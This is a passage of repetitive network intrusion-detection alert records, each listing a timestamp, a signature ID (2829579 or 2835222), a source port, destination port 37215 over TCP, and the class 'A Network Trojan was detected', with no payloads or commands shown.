              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154156
              SID:2829579
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584460
              SID:2829579
              Source Port:49888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759685
              SID:2829579
              Source Port:50700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108674
              SID:2835222
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547720
              SID:2829579
              Source Port:50240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965537
              SID:2829579
              Source Port:34848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079805
              SID:2829579
              Source Port:35140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187434
              SID:2829579
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663577
              SID:2835222
              Source Port:39218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967165
              SID:2835222
              Source Port:50492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519484
              SID:2835222
              Source Port:55902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435289
              SID:2829579
              Source Port:45588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233357
              SID:2829579
              Source Port:34580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481896
              SID:2835222
              Source Port:57812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383342
              SID:2835222
              Source Port:38180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926540
              SID:2829579
              Source Port:35660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285144
              SID:2835222
              Source Port:58526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232634
              SID:2835222
              Source Port:54802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517294
              SID:2829579
              Source Port:60128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044368
              SID:2835222
              Source Port:56850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814780
              SID:2829579
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661339
              SID:2835222
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692670
              SID:2835222
              Source Port:50502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980709
              SID:2829579
              Source Port:49264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453692
              SID:2829579
              Source Port:58806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340824
              SID:2835222
              Source Port:53448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096786
              SID:2829579
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060777
              SID:2835222
              Source Port:48844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187951
              SID:2835222
              Source Port:56548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990918
              SID:2835222
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882472
              SID:2835222
              Source Port:44006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574740
              SID:2829579
              Source Port:39808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870345
              SID:2829579
              Source Port:53138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883575
              SID:2829579
              Source Port:41108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055319
              SID:2835222
              Source Port:37266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128759
              SID:2835222
              Source Port:46996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980964
              SID:2835222
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233753
              SID:2835222
              Source Port:51026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235458
              SID:2835222
              Source Port:59224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530826
              SID:2829579
              Source Port:55964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103602
              SID:2835222
              Source Port:55990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836413
              SID:2829579
              Source Port:43204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478221
              SID:2835222
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152858
              SID:2829579
              Source Port:49382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662632
              SID:2829579
              Source Port:47712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253709
              SID:2835222
              Source Port:51006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633109
              SID:2829579
              Source Port:43960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.925975
              SID:2829579
              Source Port:50784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313405
              SID:2835222
              Source Port:44684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186096
              SID:2835222
              Source Port:60146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488277
              SID:2835222
              Source Port:55766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.665002
              SID:2829579
              Source Port:50160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396620
              SID:2835222
              Source Port:41222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924325
              SID:2829579
              Source Port:37120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040776
              SID:2835222
              Source Port:44542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483462
              SID:2829579
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426460
              SID:2829579
              Source Port:35480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519572
              SID:2835222
              Source Port:42784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622009
              SID:2829579
              Source Port:34386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526808
              SID:2829579
              Source Port:50350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334155
              SID:2829579
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049304
              SID:2835222
              Source Port:50778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595429
              SID:2829579
              Source Port:33148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477848
              SID:2835222
              Source Port:43476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492993
              SID:2835222
              Source Port:56274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801646
              SID:2835222
              Source Port:45850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062703
              SID:2835222
              Source Port:57564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169268
              SID:2829579
              Source Port:53236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444682
              SID:2829579
              Source Port:50142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601297
              SID:2829579
              Source Port:33420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837349
              SID:2829579
              Source Port:57028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444714
              SID:2829579
              Source Port:36232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205998
              SID:2835222
              Source Port:37230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572003
              SID:2835222
              Source Port:49396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113744
              SID:2835222
              Source Port:42472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346861
              SID:2829579
              Source Port:38294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495434
              SID:2835222
              Source Port:51512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502996
              SID:2835222
              Source Port:43646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119732
              SID:2835222
              Source Port:36320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254468
              SID:2835222
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797185
              SID:2829579
              Source Port:37768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347819
              SID:2829579
              Source Port:57228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478420
              SID:2835222
              Source Port:35884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981067
              SID:2835222
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391610
              SID:2835222
              Source Port:56240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636779
              SID:2829579
              Source Port:55574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759737
              SID:2829579
              Source Port:44290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341195
              SID:2835222
              Source Port:49826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123256
              SID:2829579
              Source Port:56264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724767
              SID:2829579
              Source Port:49088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503587
              SID:2835222
              Source Port:33686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725291
              SID:2829579
              Source Port:42916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671474
              SID:2829579
              Source Port:58194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341166
              SID:2835222
              Source Port:36358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123224
              SID:2835222
              Source Port:38394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639722
              SID:2835222
              Source Port:51754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079844
              SID:2829579
              Source Port:32818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197330
              SID:2835222
              Source Port:57568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596238
              SID:2835222
              Source Port:45154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2829579
              Source Port:60552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116777
              SID:2829579
              Source Port:55682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101703
              SID:2835222
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503791
              SID:2829579
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858993
              SID:2829579
              Source Port:38626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187438
              SID:2829579
              Source Port:34272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484482
              SID:2829579
              Source Port:32812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994048
              SID:2835222
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636233
              SID:2829579
              Source Port:36772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152628
              SID:2835222
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763985
              SID:2829579
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450175
              SID:2835222
              Source Port:56930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444027
              SID:2829579
              Source Port:45950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926931
              SID:2835222
              Source Port:44392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700884
              SID:2835222
              Source Port:45340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578853
              SID:2829579
              Source Port:49804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494642
              SID:2829579
              Source Port:38510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452663
              SID:2835222
              Source Port:32916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151020
              SID:2829579
              Source Port:44864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535364
              SID:2829579
              Source Port:47106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494386
              SID:2829579
              Source Port:44398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727326
              SID:2835222
              Source Port:46522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519628
              SID:2835222
              Source Port:37514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622802
              SID:2829579
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517445
              SID:2829579
              Source Port:44354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186447
              SID:2835222
              Source Port:51886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428951
              SID:2829579
              Source Port:40382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458308
              SID:2829579
              Source Port:46004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285094
              SID:2835222
              Source Port:51480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828662
              SID:2835222
              Source Port:51790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631322
              SID:2829579
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629554
              SID:2829579
              Source Port:55230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988556
              SID:2835222
              Source Port:50834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536604
              SID:2835222
              Source Port:56954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068718
              SID:2835222
              Source Port:46768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478279
              SID:2829579
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377328
              SID:2829579
              Source Port:50372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420382
              SID:2835222
              Source Port:38266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975227
              SID:2835222
              Source Port:37396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484623
              SID:2829579
              Source Port:34530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516314
              SID:2829579
              Source Port:41604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802808
              SID:2829579
              Source Port:34378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.071117
              SID:2835222
              Source Port:59118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128765
              SID:2829579
              Source Port:42688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631214
              SID:2829579
              Source Port:46356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.660863
              SID:2829579
              Source Port:42606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.825892
              SID:2829579
              Source Port:39672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118388
              SID:2835222
              Source Port:51898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918044
              SID:2829579
              Source Port:44712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065646
              SID:2835222
              Source Port:41046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.742963
              SID:2829579
              Source Port:53108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750464
              SID:2829579
              Source Port:54268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063252
              SID:2835222
              Source Port:59868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727072
              SID:2829579
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395147
              SID:2829579
              Source Port:48072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186603
              SID:2835222
              Source Port:45906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411730
              SID:2835222
              Source Port:37148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368588
              SID:2829579
              Source Port:60628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059656
              SID:2829579
              Source Port:59962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245557
              SID:2829579
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594851
              SID:2829579
              Source Port:54196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752006
              SID:2835222
              Source Port:45948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159699
              SID:2835222
              Source Port:38356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539908
              SID:2835222
              Source Port:33216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454384
              SID:2829579
              Source Port:50376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116596
              SID:2835222
              Source Port:59800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282897
              SID:2835222
              Source Port:36588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287796
              SID:2829579
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457708
              SID:2835222
              Source Port:51190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503652
              SID:2829579
              Source Port:51292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059598
              SID:2835222
              Source Port:36252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553566
              SID:2835222
              Source Port:55878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164096
              SID:2835222
              Source Port:45092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973874
              SID:2829579
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857143
              SID:2835222
              Source Port:59148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303266
              SID:2829579
              Source Port:45988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797180
              SID:2829579
              Source Port:50068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519179
              SID:2835222
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538387
              SID:2835222
              Source Port:41772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154981
              SID:2835222
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456913
              SID:2829579
              Source Port:49042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482104
              SID:2829579
              Source Port:45820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103212
              SID:2835222
              Source Port:58670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663677
              SID:2829579
              Source Port:54344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743041
              SID:2835222
              Source Port:43124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411264
              SID:2835222
              Source Port:54766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802689
              SID:2829579
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061445
              SID:2829579
              Source Port:39054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454495
              SID:2829579
              Source Port:49568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394911
              SID:2829579
              Source Port:52468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570669
              SID:2829579
              Source Port:56652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100656
              SID:2829579
              Source Port:35774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404323
              SID:2835222
              Source Port:54016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102427
              SID:2835222
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575146
              SID:2835222
              Source Port:49152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112651
              SID:2835222
              Source Port:40294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099853
              SID:2835222
              Source Port:55992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099880
              SID:2829579
              Source Port:59444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
